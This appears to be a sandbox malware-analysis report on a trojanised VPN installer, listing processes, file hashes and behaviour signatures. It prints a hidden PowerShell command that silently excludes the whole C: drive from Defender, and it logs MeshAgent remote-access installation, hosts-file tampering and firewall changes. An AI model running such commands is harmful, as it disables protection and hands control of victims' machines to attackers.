powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRm9yY2UgLUV4Y2x1c2lvblBhdGggIkM6XCI=')); Invoke-Expression $script}"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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')); Invoke-Expression $script}"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
C:\Windows\SysWOW64\cmd.exe
"cmd" /c "taskkill /IM WireVPNUImpl.exe /F"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\taskkill.exe
taskkill /IM WireVPNUImpl.exe /F
C:\Windows\SysWOW64\cmd.exe
"cmd" /c "taskkill /IM vpn-unlimited.exe /F"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\taskkill.exe
taskkill /IM vpn-unlimited.exe /F
C:\Users\Admin\AppData\Local\Temp\a32ab69f77c0b699954b90cb84dabca5
C:\Users\Admin\AppData\Local\Temp\a32ab69f77c0b699954b90cb84dabca5
C:\Windows\SysWOW64\cmd.exe
"cmd" /c "taskkill /IM vpn-unlimited-launcher.exe /F"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\taskkill.exe
taskkill /IM vpn-unlimited-launcher.exe /F
C:\Windows\SysWOW64\cmd.exe
"cmd" /c "taskkill /IM vpn-unlimited-daemon.exe /F"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\taskkill.exe
taskkill /IM vpn-unlimited-daemon.exe /F
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2888 -ip 2888
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRm9yY2UgLUV4Y2x1c2lvblBhdGggIkM6XCI=')); Invoke-Expression $script}"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2888 -s 92
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{de06eec6-4818-43a6-8102-f6057e43f84d}
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 448 -p 2576 -ip 2576
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2576 -s 300
C:\Users\Admin\AppData\Local\Temp\is-JFEMB.tmp\VC_redist.x64.exe
"C:\Users\Admin\AppData\Local\Temp\is-JFEMB.tmp\VC_redist.x64.exe" /install /quiet /norestart
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\Temp\{89C18D32-D6C3-4330-A467-E30AB2ACED1E}\.cr\VC_redist.x64.exe
"C:\Windows\Temp\{89C18D32-D6C3-4330-A467-E30AB2ACED1E}\.cr\VC_redist.x64.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\is-JFEMB.tmp\VC_redist.x64.exe" -burn.filehandle.attached=724 -burn.filehandle.self=728 /install /quiet /norestart
C:\Windows\Temp\{EFD9F19E-3118-4812-952D-3DDA554BA588}\.be\VC_redist.x64.exe
"C:\Windows\Temp\{EFD9F19E-3118-4812-952D-3DDA554BA588}\.be\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{6C2E67EE-226C-478D-A0FE-6759E7EF27A8} {E4EEE1B2-E834-486A-9681-45E71D07E37B} 1256
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F32D97DF-E3E5-4CB9-9E3E-0EB5B4E49801}
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k swprv
C:\Users\Admin\AppData\Local\Temp\meshagent32-mesh.exe
"C:\Users\Admin\AppData\Local\Temp\meshagent32-mesh.exe" -fullinstall
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
C:\Windows\SysWOW64\wbem\wmic.exe
wmic SystemEnclosure get ChassisTypes
C:\Windows\SysWOW64\wbem\wmic.exe
wmic os get oslanguage /FORMAT:LIST
C:\Windows\SysWOW64\wbem\wmic.exe
wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
C:\Windows\SysWOW64\wbem\wmic.exe
wmic os get oslanguage /FORMAT:LIST
C:\Windows\SysWOW64\wbem\wmic.exe
wmic SystemEnclosure get ChassisTypes
C:\Windows\SysWOW64\wbem\wmic.exe
wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
C:\Users\Admin\AppData\Local\Temp\a32ab69f77c0b699954b90cb84dabca5
"C:\Users\Admin\AppData\Local\Temp\a32ab69f77c0b699954b90cb84dabca5"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 5576 -ip 5576
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5576 -s 1356
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 5576 -ip 5576
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5576 -s 1376
C:\Windows\SysWOW64\wbem\wmic.exe
wmic SystemEnclosure get ChassisTypes
C:\Windows\SysWOW64\wbem\wmic.exe
wmic os get oslanguage /FORMAT:LIST
C:\Windows\SysWOW64\wbem\wmic.exe
wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
C:\Windows\SysWOW64\wbem\wmic.exe
wmic SystemEnclosure get ChassisTypes
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\wbem\wmic.exe
wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe
"C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe" -uninstall -quiet -burn.related.upgrade -burn.ancestors={8bdfe669-9705-4184-9368-db9ce581e0e7} -burn.filehandle.self=1140 -burn.embedded BurnPipe.{67D12AAD-89BC-4752-A635-BC93BB8D8B52} {1DAC1AC4-FEA7-4ADF-A28E-C8A87723B15E} 4648
C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe
"C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe" -burn.clean.room="C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe" -burn.filehandle.attached=576 -burn.filehandle.self=596 -uninstall -quiet -burn.related.upgrade -burn.ancestors={8bdfe669-9705-4184-9368-db9ce581e0e7} -burn.filehandle.self=1140 -burn.embedded BurnPipe.{67D12AAD-89BC-4752-A635-BC93BB8D8B52} {1DAC1AC4-FEA7-4ADF-A28E-C8A87723B15E} 4648
C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe
"C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{84A4313E-8E2A-45AA-9D9E-9BEF00D27F73} {A9309FD9-760D-4B1F-A8AC-07BA15979D85} 6024
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-JFEMB.tmp\firewall_exception.bat" "C:\Program Files (x86)\VPN Unlimited\vpn-unlimited.exe" "C:\Program Files (x86)\VPN Unlimited\openvpn.exe""
C:\Program Files (x86)\VPN Unlimited\vpn-unlimited-daemon.exe
"C:\Program Files (x86)\VPN Unlimited\vpn-unlimited-daemon.exe" -install
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall delete rule name="VPN Unlimited"
C:\Program Files (x86)\VPN Unlimited\vpn-unlimited-daemon.exe
"C:\Program Files (x86)\VPN Unlimited\vpn-unlimited-daemon.exe" -start
C:\Program Files (x86)\VPN Unlimited\vpn-unlimited-daemon.exe
"C:\Program Files (x86)\VPN Unlimited\vpn-unlimited-daemon.exe"
C:\Windows\SysWOW64\msiexec.exe
"msiexec.exe" /uninstall "C:\Users\Admin\AppData\Local\Temp\is-JFEMB.tmp\TunSetupVPNU.msi" /quiet
C:\Windows\SysWOW64\sc.exe
"C:\Windows\system32\sc.exe" create VPNUSplitTunnel type= kernel binPath= "C:\Program Files (x86)\VPN Unlimited\VpnuDriver\VpnuDriver.sys"
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall delete rule name="OpenVPN"
C:\Program Files (x86)\VPN Unlimited\vpnu-push.exe
"C:\Program Files (x86)\VPN Unlimited\vpnu-push.exe" --only-create-shortcut
C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe
"C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe" /r remove =net *Wintun
C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe
"C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe" /r remove =net *WireGuard
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="VPN Unlimited" dir=in action=allow program="C:\Program Files (x86)\VPN Unlimited\vpn-unlimited.exe" enable=yes
C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe
"C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe" remove tap0901
C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe
"C:\Program Files (x86)\VPN Unlimited\recovery\tap\x64\tapinstall.exe" install OemVista.inf tap0901
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="VPN Unlimited" dir=out action=allow program="C:\Program Files (x86)\VPN Unlimited\vpn-unlimited.exe" enable=yes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{f22e1a6f-710a-5048-bd80-6329e477a3ab}\oemvista.inf" "9" "4d14a44ff" "0000000000000148" "WinSta0\Default" "0000000000000160" "208" "c:\program files (x86)\vpn unlimited\recovery\tap\x64"
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="OpenVPN" dir=in action=allow program="C:\Program Files (x86)\VPN Unlimited\openvpn.exe" enable=yes
C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem3.inf" "oem3.inf:3beb73aff103cc24:tap0901.ndi:9.24.6.601:tap0901," "4d14a44ff" "0000000000000194"
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="OpenVPN" dir=out action=allow program="C:\Program Files (x86)\VPN Unlimited\openvpn.exe" enable=yes
C:\Program Files (x86)\Mesh Agent\MeshAgent.exe
"C:\Program Files (x86)\Mesh Agent\MeshAgent.exe"
C:\Windows\SysWOW64\wbem\wmic.exe
wmic SystemEnclosure get ChassisTypes
C:\Windows\SysWOW64\wbem\wmic.exe
wmic os get oslanguage /FORMAT:LIST
C:\Windows\SysWOW64\wbem\wmic.exe
wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
C:\Windows\SysWOW64\wbem\wmic.exe
wmic SystemEnclosure get ChassisTypes
C:\Windows\SysWOW64\wbem\wmic.exe
wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3877855 /state1:0x41c64e6d
Network
Files
C:\Users\Admin\AppData\Local\Temp\jgt.exe
| MD5 | 1417d38c40d85d1c4eb7fad3444ca069 |
| SHA1 | 27d8e2ca9537c80d1c1148830f9a6499f1e3e797 |
| SHA256 | 5f7c6cdea3c4e825af1d796cbd34b2d45b2b6fabed130e717a30a6d871993f5d |
| SHA512 | a169f8c5925977a984bc00a2b379205ed527777865215e4ffdfeb30084d1ed08f7bb5222db8898161f1e6151d4a75e8ccc366543cf041e47effc21dcf4c351ab |
memory/5080-57-0x0000000000400000-0x00000000004F2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp
| MD5 | 5b16ce0d91e8e275b88fec9fe288d519 |
| SHA1 | 6a22411e2b9e50300e5be2bbabaa136ce3cc7ef5 |
| SHA256 | 4c8ca58ccee5032b2529103636cbea664c401a287a296493a477d9619852eeaa |
| SHA512 | 00643260f19396df1b44cce93cca8d6c636fc89741e301ee163a84321ee59e455453904f92e81a6b8f9a28a100d03275e997bfebd6390cb00870947b21a28b3c |
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe
| MD5 | 48c96771106dbdd5d42bba3772e4b414 |
| SHA1 | e84749b99eb491e40a62ed2e92e4d7a790d09273 |
| SHA256 | a96d26428942065411b1b32811afd4c5557c21f1d9430f3696aa2ba4c4ac5f22 |
| SHA512 | 9f891c787eb8ceed30a4e16d8e54208fa9b19f72eeec55b9f12d30dc8b63e5a798a16b1ccc8cea3e986191822c4d37aedb556e534d2eb24e4a02259555d56a2c |
C:\Users\Admin\AppData\Roaming\Installer\jre\lib\i386\jvm.cfg
| MD5 | 9fd47c1a487b79a12e90e7506469477b |
| SHA1 | 7814df0ff2ea1827c75dcd73844ca7f025998cc6 |
| SHA256 | a73aea3074360cf62adedc0c82bc9c0c36c6a777c70da6c544d0fba7b2d8529e |
| SHA512 | 97b9d4c68ac4b534f86efa9af947763ee61aee6086581d96cbf7b3dbd6fd5d9db4b4d16772dce6f347b44085cef8a6ea3bfd3b84fbd9d4ef763cef39255fbce3 |
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\msvcr100.dll
| MD5 | bf38660a9125935658cfa3e53fdc7d65 |
| SHA1 | 0b51fb415ec89848f339f8989d323bea722bfd70 |
| SHA256 | 60c06e0fa4449314da3a0a87c1a9d9577df99226f943637e06f61188e5862efa |
| SHA512 | 25f521ffe25a950d0f1a4de63b04cb62e2a3b0e72e7405799586913208bf8f8fa52aa34e96a9cc6ee47afcd41870f3aa0cd8289c53461d1b6e792d19b750c9a1 |
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\client\jvm.dll
| MD5 | 39c302fe0781e5af6d007e55f509606a |
| SHA1 | 23690a52e8c6578de6a7980bb78aae69d0f31780 |
| SHA256 | b1fbdbb1e4c692b34d3b9f28f8188fc6105b05d311c266d59aa5e5ec531966bc |
| SHA512 | 67f91a75e16c02ca245233b820df985bd8290a2a50480dff4b2fd2695e3cf0b4534eb1bf0d357d0b14f15ce8bd13c82d2748b5edd9cc38dc9e713f5dc383ed77 |
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\verify.dll
| MD5 | de2167a880207bbf7464bcd1f8bc8657 |
| SHA1 | 0ff7a5ea29c0364a1162a090dffc13d29bc3d3c7 |
| SHA256 | fd856ea783ad60215ce2f920fcb6bb4e416562d3c037c06d047f1ec103cd10b3 |
| SHA512 | bb83377c5cff6117cec6fbadf6d40989ce1ee3f37e4ceba17562a59ea903d8962091146e2aa5cc44cfdddf280da7928001eea98abf0c0942d69819b2433f1322 |
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\zip.dll
| MD5 | cb99b83bbc19cd0e1c2ec6031d0a80bc |
| SHA1 | 927e1e24fd19f9ca8b5191ef3cc746b74ab68bcd |
| SHA256 | 68148243e3a03a3a1aaf4637f054993cb174c04f6bd77894fe84d74af5833bec |
| SHA512 | 29c4978fa56f15025355ce26a52bdf8197b8d8073a441425df3dfc93c7d80d36755cc05b6485dd2e1f168df2941315f883960b81368e742c4ea8e69dd82fa2ba |
C:\Users\Admin\AppData\Roaming\Installer\jre\bin\java.dll
| MD5 | 73bd0b62b158c5a8d0ce92064600620d |
| SHA1 | 63c74250c17f75fe6356b649c484ad5936c3e871 |
| SHA256 | e7b870deb08bc864fa7fd4dec67cef15896fe802fafb3009e1b7724625d7da30 |
| SHA512 | eba1cf977365446b35740471882c5209773a313de653404a8d603245417d32a4e9f23e3b6cd85721143d2f9a0e46ed330c3d8ba8c24aee390d137f9b5cd68d8f |
C:\Users\Admin\AppData\Roaming\Installer\jre\lib\meta-index
| MD5 | 91aa6ea7320140f30379f758d626e59d |
| SHA1 | 3be2febe28723b1033ccdaa110eaf59bbd6d1f96 |
| SHA256 | 4af21954cdf398d1eae795b6886ca2581dac9f2f1d41c98c6ed9b5dbc3e3c1d4 |
| SHA512 | 03428803f1d644d89eb4c0dcbdea93acaac366d35fc1356ccabf83473f4fef7924edb771e44c721103cec22d94a179f092d1bfd1c0a62130f076eb82a826d7cb |
C:\Users\Admin\AppData\Roaming\Installer\jre\lib\ext\meta-index
| MD5 | 77abe2551c7a5931b70f78962ac5a3c7 |
| SHA1 | a8bb53a505d7002def70c7a8788b9a2ea8a1d7bc |
| SHA256 | c557f0c9053301703798e01dc0f65e290b0ae69075fb49fcc0e68c14b21d87f4 |
| SHA512 | 9fe671380335804d4416e26c1e00cded200687db484f770ebbdb8631a9c769f0a449c661cb38f49c41463e822beb5248e69fd63562c3d8c508154c5d64421935 |
C:\Users\Admin\AppData\Roaming\Installer\lib\asm-all.jar
| MD5 | f5ad16c7f0338b541978b0430d51dc83 |
| SHA1 | 2ea49e08b876bbd33e0a7ce75c8f371d29e1f10a |
| SHA256 | 7fbffbc1db3422e2101689fd88df8384b15817b52b9b2b267b9f6d2511dc198d |
| SHA512 | 82e6749f4a6956f5b8dd5a5596ca170a1b7ff4e551714b56a293e6b8c7b092cbec2bec9dc0d9503404deb8f175cbb1ded2e856c6bc829411c8ed311c1861336a |
C:\Users\Admin\AppData\Roaming\Installer\lib\dn-compiled-module.jar
| MD5 | bd1f1a2246004487d4c84a233cea37f7 |
| SHA1 | 24b9e6f765da1bcd2d424fd28b68fc40e368520e |
| SHA256 | 5183a2bca7735453b7fd5ca57ebb47ad32dd82d830eaddafed50a658164bdd76 |
| SHA512 | 800e6a5dd529e9627320c7989720c0086a76ca7fbca6d3ccfcfea04871017a0f212926ccf3b4c16c958615e5ca0db19a53ccee53f17034384eb8c9c933e7608c |
C:\Users\Admin\AppData\Roaming\Installer\lib\dn-php-sdk.jar
| MD5 | 3e5e8cccff7ff343cbfe22588e569256 |
| SHA1 | 66756daa182672bff27e453eed585325d8cc2a7a |
| SHA256 | 0f26584763ef1c5ec07d1f310f0b6504bc17732f04e37f4eb101338803be0dc4 |
| SHA512 | 8ea5f31e25c3c48ee21c51abe9146ee2a270d603788ec47176c16acac15dad608eef4fa8ca0f34a1bbc6475c29e348bd62b0328e73d2e1071aaa745818867522 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-14 17:53
Reported
2024-10-14 17:55
Platform
win11-20241007-en
Max time kernel
69s
Max time network
86s
Command Line
Signatures
Detects MeshAgent payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
MeshAgent
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4676 created 636 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Creates new service(s)
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\jgt.exe | N/A |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\ProgramData\Google\Chrome\updater.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Stops running service(s)
Executes dropped EXE
Loads dropped DLL
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\{8bdfe669-9705-4184-9368-db9ce581e0e7} = "\"C:\\ProgramData\\Package Cache\\{8bdfe669-9705-4184-9368-db9ce581e0e7}\\VC_redist.x64.exe\" /burn.runonce" | C:\Windows\Temp\{8104DCFE-FB5A-4688-88BC-0BDB39ADB238}\.be\VC_redist.x64.exe | N/A |
Checks installed software on the system
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Power Settings
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\mfc140ita.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\CatRoot2\edb.log | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\mfc140enu.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\msvcp140_atomic_wait.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfc140chs.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{a08386d2-f39e-f749-b331-6738a5981e18}\SETA738.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{a08386d2-f39e-f749-b331-6738a5981e18}\SETA739.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\CatRoot2\dberr.txt | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\system32\vccorlib140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\vcomp140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfc140rus.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfcm140u.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{a08386d2-f39e-f749-b331-6738a5981e18}\tap0901.cat | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_662fd96dfdced4ae\tap0901.sys | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\system32\msvcp140_2.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\mfc140u.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfc140u.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{a08386d2-f39e-f749-b331-6738a5981e18}\oemvista.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{a08386d2-f39e-f749-b331-6738a5981e18}\tap0901.sys | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\system32\CatRoot2\edb.jcp | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\vcruntime140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\msvcp140_codecvt_ids.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\vcamp140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfc140enu.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\concrt140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\mfc140deu.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfc140esn.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\system32\mfcm140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\system32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\oem3.cat | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\CatRoot2\edb.chk | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\CatRoot2\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\catdb.jfm | C:\Windows\system32\svchost.exe | N/A |
